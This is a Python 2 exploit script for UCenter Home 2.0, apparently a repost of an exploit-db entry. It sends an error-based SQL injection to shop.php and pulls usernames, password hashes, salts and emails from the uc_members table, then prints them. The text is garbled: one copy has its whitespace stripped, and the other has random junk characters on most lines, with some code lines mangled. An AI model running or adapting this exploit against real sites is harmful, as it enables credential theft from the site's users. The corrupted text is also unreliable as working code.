#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
8 @1 E3 Y* W2 }0 m: s% q/ e 2 o6 }3 a1 W6 \( K! U, ?9 M
$ i, n0 k4 A+ b t#!/usr/bin/env python / ?& J/ |. s# ^2 e2 O& ^# Q
\, p# E6 k3 E7 P# P' Uimport sys
7 Z3 ~- z% n" s% g& A& Ximport urllib2
( F- H% U' H9 p) ~9 G: \: ?import re # b. L" ^9 W8 j! g
6 }$ E B5 p# r, T. ]8 fdef info():
_. k# D: P7 C0 @9 ^ print 'From:http://www.exploit-db.com/exploits/14997/' ; q) H9 u. t. ?# `" {
print 'http://www.hake.cc/Web_loudong/'
9 M! f# }/ Q1 | print 'changed:qiaoy' . P* O: X+ w* ?6 ?
print 'exp:' + ?8 G: V$ I0 ^
print ' ./UCenter_Home_2.0.py site'
/ n# K& h4 ]9 k9 D8 A, e
- E) W. `: d& O5 qdef main():
& N9 \9 N" z3 _$ @( z5 N9 Q9 D& B if len(sys.argv) != 2:
6 _& z3 F' f; R; E) y info()
; \% r& q6 \9 O+ N2 @* ?4 w0 F, m else: ) x; b% }3 y n9 O% i1 X
site = sys.argv[1]
2 m- ? E6 \$ |# ] if site[0:7] == 'http://':
4 }1 B# a5 J, \! L9 C: Q sitesite =site 0 `: o7 C3 n; Q9 P9 w3 i4 R/ l
elif site[0:8] == 'https://':
2 u" q2 g5 o- ?7 g sitesite = site 0 M- \$ O. U% Z
else:
- K5 I" p2 n: D: |' L9 |$ V' w site = 'http://'+site
8 c0 I5 P3 l/ y) Y3 m- z- m2 J try:
- o$ H& w8 R% k* a2 D url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'
; p' N: _9 z0 B4 z+ u5 i1 \ Value = urllib2.urlopen(url).read()
2 f7 D4 `- x3 D Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0] . M' o' i0 S( k( w& Z- _8 |6 C- P
hacked = Msg.split(':')
; b% F5 }" g. @ print 'Name: '+hacked[1] : E- |# u3 v( ^' M( D5 D& s
print 'Passwd: '+hacked[2] 6 r* [6 V# w, P2 ?, n. `
print 'salt: '+hacked[3] ' [+ K3 p% l. y' P8 d' Q( D
print 'email: '+hacked[4]
. t. ]2 R$ k8 W* }- ^ except:
- j& q( M7 p/ } u# s! N- b, k! h print 'Sorry,I can\'t work............'
' B% Z, f6 \ a. k, K2 n' Q- P3 D7 Q+ O
! m9 {, M* d+ j, }, v( @& h3 j0 `if __name__ == '__main__': & {, B0 b1 }# K, G
main() |